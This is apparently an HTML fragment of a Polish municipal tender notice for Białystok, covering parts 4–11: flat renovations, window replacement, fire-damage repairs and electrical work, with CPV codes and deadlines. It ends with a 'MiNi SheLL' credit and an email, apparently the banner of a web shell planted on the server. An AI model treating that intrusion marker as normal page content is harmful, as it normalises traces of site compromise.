<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 4
REMONT LOKALU MIESZKALNEGO PRZED ZASIEDLENIEM  PRZY                         UL. DOJNOWSKIEJ 80A  m 34  W  BIAŁYMSTOKU.
       Branża budowlana
  1. Opis robót , rysunki-szkice -zał.1.1a
       2. Przedmiar  robót - zał. 1.2 a
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót (Br. Bud.) - zał.1.3a
Branża sanitarna
  1. Opis robót  -zał. 1.1 b
       2. Przedmiar  robót - zał. 1.2b
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót(Br. san.) - zał. 1.3b
Branża elektryczna 
  1. Opis robót  -zał. 1.1 c
       2. Przedmiar  robót - zał. 1.2 c
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót(Br. el..) - zał. 1.3 c.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.21.00-5, 45.44.21.00-8, 45.33.20.00-3, 45.31.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE 5 
WYMIANA STOLARKI OKIENNEJ W LOKALU MIESZKALNYM  PRZY        UL. BEMA  89A m 47 , UL. BEMA 89C m 58 , UL. BEMA 91 m 55,            UL. BEMA 93 m 2, UL. BEMA 95 m 21, UL.BEMA  101 m 71,                     UL. KOPERNIKA 7 m 18, UL.WIEJSKA 4B m 61 i UL. KLEPACKA 2D m 4  W  BIAŁYMSTOKU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 5 
WYMIANA STOLARKI OKIENNEJ W LOKALU MIESZKALNYM  PRZY        UL. BEMA  89A m 47 , UL. BEMA 89C m 58 , UL. BEMA 91 m 55,            UL. BEMA 93 m 2, UL. BEMA 95 m 21, UL.BEMA  101 m 71,                     UL. KOPERNIKA 7 m 18, UL.WIEJSKA 4B m 61 i UL. KLEPACKA 2D m 4  W  BIAŁYMSTOKU.
        Branża budowlana
  1. Opis robót -zał.2.1a i 2,.1b
       2. Przedmiar  robót - zał. 2.2 a i 2.2 b
       3. Specyfikacja Technicz. Wykonania i Odbioru Robót (Br. Bud) - zał. 2.3a i 2.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.00-5, 45.42.11.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE 6
REMONT KLATKI SCHODOWEJ III PO POŻARZE W BUDYNKU MIESZKALNYM PRZY UL. BARSZCZAŃSKIEJ 6  W  BIAŁYMSTOKU 
WYMIANA OKIEN I UZUPEŁNIENIE SKRZYDŁA DRZWIOWEGO NA KLATCE SCHODOWEJ II NA I PIĘTRZE W BUDYNKU MIESZKALNYM PRZY UL. BARSZCZAŃSKIEJ 10 W  BIAŁYMSTOKU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 6
REMONT KLATKI SCHODOWEJ III PO POŻARZE W BUDYNKU MIESZKALNYM PRZY UL. BARSZCZAŃSKIEJ 6  W  BIAŁYMSTOKU 
        Branża budowlana
  1. Opis robót -zał.3.1 A
       2. Przedmiar  robót - zał. 3.2 A
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót(Br. Bud.) - zał. 3.3 A
WYMIANA OKIEN I UZUPEŁNIENIE SKRZYDŁA DRZWIOWEGO NA KLATCE SCHODOWEJ II NA I PIĘTRZE W BUDYNKU MIESZKALNYM PRZY UL. BARSZCZAŃSKIEJ 10 W  BIAŁYMSTOKU.
        Branża budowlana
  1. Opis robót -zał.3.1 B
       2. Przedmiar  robót - zał. 3.2 B
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót(Br. Bud.) - zał. 3.3 B.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.21.00-8, 45.42.10.00-4, 45.42.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE 7
REMONT  INSTALACJI ELEKTRYCZNEJ W LOKALU MIESZKALNYM  PRZY UL. BRONIEWSKIEGO 19 m 14,  TUWIMA 1/1 m 61, TUWIMA 1/3 m 56 , TUWIMA 1/1  m 3  i UL.  SOBIESKIEGO 2 m 3   W  BIAŁYMSTOKU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 7
REMONT  INSTALACJI ELEKTRYCZNEJ W LOKALU MIESZKALNYM  PRZY UL. BRONIEWSKIEGO 19 m 14,  TUWIMA 1/1 m 61, TUWIMA 1/3 m 56 , TUWIMA 1/1  m 3  i UL.  SOBIESKIEGO 2 m 3   W  BIAŁYMSTOKU.               
Branża elektryczna 
  1. Opis robót + schematy po 2 egz.  -zał. 1.1 a, 1.1 b, 1.1 c,1.1 d i 1.1 e
       2. Przedmiar  robót - zał. 1.2 a i 1.2 b,1.2 c. 1.2 d i 1.2 e
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót (Br. el.) - zał. 1.3 a,     
           1.3 b , 1.3 c, 1.3 d i 1.3 e..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZADANIE 8 
WYMIANA STOLARKI OKIENNEJ W LOKALU MIESZKALNYM  PRZY        UL. KILIŃSKIEGO 10 W  BIAŁYMSTOKU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 8 
WYMIANA STOLARKI OKIENNEJ W LOKALU MIESZKALNYM  PRZY        UL. KILIŃSKIEGO 10 W  BIAŁYMSTOKU.
        Branża budowlana
  1. Opis robót -zał.2.1
       2. Przedmiar  robót - zał. 2.2 
  3. Specyfikacja Technicz. Wykonania i Odbioru Robót (Br. Bud) - zał. 2.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.00-5, 45.42.11.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ZADANIE  9 
WYMIANA STOLARKI OKIENNEJ W LOKALU MIESZKALNYM  NR   2A  I  3
ORAZ DRZWI  WEJŚCIOWYCH  DO BUDYNKU  PRZY UL.ŚWIETOJAŃSKIEJ 26  W BIAŁYMSTOKU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  9 
WYMIANA STOLARKI OKIENNEJ W LOKALU MIESZKALNYM  NR   2A  I  3
ORAZ DRZWI  WEJŚCIOWYCH  DO BUDYNKU  PRZY UL.ŚWIETOJAŃSKIEJ 26  W BIAŁYMSTOKU.
        Branża budowlana
  1. Opis robót = szkice  -zał.3.1 
       2. Przedmiar  robót - zał. 3.2 
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót(Br. Bud.) - zał. 3.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.00-5, 45.42.11.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ZADANIE  10
NAPRAWA ELEWACJI PO POŻARZE BUDYNKÓW MIESZKALNYCH PRZY UL. BARSZCZAŃSKIEJ 4 i 8  W BIAŁYMSTOKU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE  10
NAPRAWA ELEWACJI PO POŻARZE BUDYNKÓW MIESZKALNYCH PRZY UL. BARSZCZAŃSKIEJ 4 i 8  W BIAŁYMSTOKU.
       Branża budowlana
  1. Opis robót -zał.4.1 
       2. Przedmiar  robót - zał. 4.2 
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót(Br. Bud.) - zał. 4.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.21.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZADANIA  11
WYMIANA STOLARKI OKIENNEJ  W  LOKALU MIESZKALNYM  PRZY         UL. BIAŁÓWNY 2 M 12   W  BIAŁYMSTOKU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIA  11
WYMIANA STOLARKI OKIENNEJ  W  LOKALU MIESZKALNYM  PRZY         UL. BIAŁÓWNY 2 M 12   W  BIAŁYMSTOKU.
      Branża budowlana
  1. Opis robót + szkice  -zał.5.1 
       2. Przedmiar  robót - zał. 5.2 
       3. Specyfikacja Techniczna Wykonania i Odbioru Robót(Br. Bud.) - zał. 4.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.42.11.00-5, 45.42.11.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com